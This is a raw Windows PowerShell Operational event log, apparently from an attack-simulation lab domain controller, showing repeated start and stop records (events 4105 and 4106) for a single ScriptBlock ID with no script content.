Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473964
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473963
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473962
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473961
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473960
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473959
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473958
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473957
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473956
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473955
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473954
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473953
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473952
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473951
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473950
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473949
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473948
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473947
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473946
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473945
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473944
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473943
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473942
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473941
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473940
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473939
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473938
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473937
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473936
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473935
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473934
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473933
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473932
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473931
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473930
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473929
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473928
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473927
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473926
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473925
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473924
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473923
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473922
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473921
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473920
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473919
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473918
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473917
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473916
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473915
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473914
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473913
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473912
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473911
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
